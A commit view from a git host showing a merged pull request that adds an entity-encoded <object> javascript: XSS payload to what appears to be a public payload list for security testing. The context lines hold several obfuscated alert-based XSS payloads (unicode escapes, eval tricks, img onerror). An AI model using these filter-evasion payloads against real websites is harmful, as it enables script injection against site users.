Merge pull request #420 from looCiprian/master

Added XSS <object> payload
This commit is contained in:
Swissky 2021-09-06 21:05:30 +02:00 committed by GitHub
commit 90f37e57ec
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -191,6 +191,7 @@ Most tools are also suitable for blind XSS attacks:
<script>\u0061lert('22')</script> <script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script> <script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" <script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
// Img payload // Img payload
<img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS');>